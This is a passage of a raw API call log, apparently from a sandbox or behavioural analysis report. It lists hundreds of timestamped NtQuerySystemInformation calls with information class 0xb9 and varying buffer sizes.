ResultLength=0x0) [0269.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x28, ResultLength=0x0) [0269.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x38, ResultLength=0x0) [0269.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x20, ResultLength=0x0) [0269.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb30, Length=0x20, ResultLength=0x0) [0269.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb30, Length=0x20, ResultLength=0x0) [0269.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb30, Length=0x20, ResultLength=0x0) [0269.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x38, ResultLength=0x0) [0269.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x20, ResultLength=0x0) [0269.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb40, Length=0x20, ResultLength=0x0) [0269.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb40, Length=0x20, ResultLength=0x0) [0269.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0269.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0269.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0269.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0269.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0269.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0269.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0269.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0269.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0269.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0269.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0269.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0269.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x28, ResultLength=0x0) [0269.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0269.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0269.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0269.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3c0, Length=0x20, ResultLength=0x0) [0269.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0269.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0269.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0269.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0269.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0269.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc480, Length=0x20, ResultLength=0x0) [0269.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc410, Length=0x20, ResultLength=0x0) [0269.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc410, Length=0x20, ResultLength=0x0) [0269.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0269.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0269.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0269.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0269.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0269.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0269.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0269.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0269.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0269.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0269.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0269.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0269.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x28, ResultLength=0x0) [0269.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0269.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0269.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0269.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3c0, Length=0x20, ResultLength=0x0) [0269.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0269.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0269.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0269.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0269.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0269.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc480, Length=0x20, ResultLength=0x0) [0269.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc410, Length=0x20, ResultLength=0x0) [0269.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc410, Length=0x20, ResultLength=0x0) [0269.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x28, ResultLength=0x0) [0269.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0269.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0269.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0269.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0269.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0269.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0269.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0269.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x20, ResultLength=0x0) [0269.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x20, ResultLength=0x0) [0269.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0269.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb10, Length=0x20, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb10, Length=0x20, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x20, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x20, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x20, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb90, Length=0x20, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb90, Length=0x20, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.250] 